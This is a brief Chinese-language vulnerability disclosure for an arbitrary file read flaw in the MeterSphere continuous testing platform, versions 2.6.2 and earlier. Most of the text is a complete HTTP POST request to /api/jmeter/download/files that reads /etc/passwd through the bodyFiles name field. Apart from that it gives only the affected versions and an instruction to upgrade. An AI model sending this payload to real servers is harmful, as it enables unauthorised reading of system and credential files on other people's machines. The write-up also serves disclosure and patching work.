漏洞说明

MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准。
Metersphere file 接口存在任意文件读取漏洞,攻击者通过接口可以获取敏感文件压缩包

影响版本

  • Metersphere <=2.6.2

漏洞复现

image-20230424163040952.png
payload:

POST /api/jmeter/download/files HTTP/1.1
Host: IP 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 73

{"reportId": "pass", "bodyFiles": [{"id": "aaa", "name": "/etc/passwd"}]}

1682652014391.jpg

修复建议

1、升级到最新安全版本